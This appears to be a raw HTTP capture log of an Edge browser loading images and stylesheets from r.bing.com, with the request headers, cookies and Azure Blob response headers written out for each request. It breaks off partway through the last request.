cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20250130&T=1738274627000
ResponseHTTP/2.0 200
etag: 0x8DCDC5EEFB0049C
content-length: 6817
content-type: image/jpeg
content-md5: DEHuMbBOl4tIgtF2kPA6Og==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 42a58b94-c01e-0048-0d59-17d80d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=121690
expires: Sat, 01 Feb 2025 07:51:58 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.32367a5c.1738274628.1ad0f7d6
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.16:443RequestGET /rp/NnFHhz2jL6yzChtIhaB5IIVKY5k.svg HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20250130&T=1738274627000
ResponseHTTP/2.0 200
etag: 0x8DCDC664D1860E2
content-length: 3814
content-type: image/jpeg
content-md5: KBVwYR+JIZqXDyWJ+YoJ2w==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3ec8f7ea-901e-0072-119f-199bae000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=61204
expires: Fri, 31 Jan 2025 15:03:52 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.32367a5c.1738274628.1ad0f7eb
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.16:443RequestGET /rp/hx-eea1zqtCz4K0bW2uH_oN7Fs4.jpg HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20250130&T=1738274627000
ResponseHTTP/2.0 200
etag: 0x8DCDC63FB5BC9CB
content-length: 4547
content-type: image/jpeg
content-md5: eu9Mz25HuboDg2XNPR9Wkw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 09ffe763-201e-0024-1c98-1673de000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=206302
expires: Sun, 02 Feb 2025 07:22:10 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.32367a5c.1738274628.1ad0f7e9
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.16:443RequestGET /rp/95z5wMy4UcfbSSSlSw780vQ5jKA.jpg HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20250130&T=1738274627000
ResponseHTTP/2.0 200
etag: 0x8DCDC65F09D13C1
content-length: 5944
content-type: image/jpeg
content-md5: 9ucNopg0mtlCFfC0podQNw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ab6448f5-c01e-0025-6b21-187223000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=78406
expires: Fri, 31 Jan 2025 19:50:34 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.32367a5c.1738274628.1ad0f7ea
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.16:443RequestGET /rp/GJDmKr3_TS3Qpm6KEL9UKUQKUO4.jpg HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20250130&T=1738274627000
ResponseHTTP/2.0 200
etag: 0x8DCDC63E1AC19C2
content-length: 324
content-type: text/css
content-encoding: br
content-md5: zul1ioyI5qjKzvVMsqd8eQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 78028e9b-b01e-0021-58f1-1687a1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=79113
expires: Fri, 31 Jan 2025 20:02:21 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.32367a5c.1738274628.1ad0f833
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.16:443RequestGET /rp/ln5TQq6AIWfcBlduDk-5bnaJMpY.jpg HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20250130&T=1738274627000
ResponseHTTP/2.0 200
etag: 0x8DCEC880F396E3D
content-length: 269
content-type: text/css
content-encoding: br
content-md5: Twb1SQrgn66TMkCHmLv8IQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 830db819-b01e-006e-2b85-1e43b9000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=345801
expires: Mon, 03 Feb 2025 22:07:09 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.32367a5c.1738274628.1ad0f834
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.16:443RequestGET /rp/dbmNS45xQvD1diApY1T2HExvOo8.jpg HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20250130&T=1738274627000
ResponseHTTP/2.0 200
etag: 0x8DCEC86967FA2A4
akamai-grn: 0.b6777b5c.1736801931.ab4b3d
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 326
content-type: text/css; charset=utf-8
content-encoding: br
content-md5: yxQVEL8D2yYKzOkWuxDcBg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d05aa843-b01e-0003-4301-22e997000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=299174
expires: Mon, 03 Feb 2025 09:10:02 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.32367a5c.1738274628.1ad0f835
timing-allow-origin: *
-
Remote address:88.221.135.16:443RequestGET /rp/cfeVf2-uV0hUo3ToTbLjztuomWk.jpg HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20250130&T=1738274627000
ResponseHTTP/2.0 200
etag: 0x8DCDC67EC841DCF
content-length: 1343
content-type: text/css
content-encoding: br
content-md5: DnViWNsgH/Vlo3SrH5gEzg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: af431a55-e01e-0032-6214-1ab240000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=234173
expires: Sun, 02 Feb 2025 15:06:41 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.32367a5c.1738274628.1ad0f837
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.16:443RequestGET /rp/lvCKZ07bEYtoYmY62ifMzVa0RIE.jpg HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2918&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20250130&T=1738274627000
ResponseHTTP/2.0 200
content-md5: kc0Rz8ymXPrOlhUyaNcfYw==
last-modified: Fri, 28 May 2021 20:38:35 GMT
etag: 0x8D9221890C98BC2
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 388bfc85-401e-002d-30d9-852b77000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.85257e68.1686747743.416d9cc0
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-encoding: gzip
content-length: 571
akamai-grn: 0.87257e68.1686747764.13548441
cache-control: public, max-age=12561828
expires: Wed, 25 Jun 2025 07:27:36 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.32367a5c.1738274628.1ad0f7c4
timing-allow-origin: *
-
Remote address:88.221.135.16:443RequestGET /rp/ni3MyKKVu9pK0SgY6gb6Z2NOGpg.jpg HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
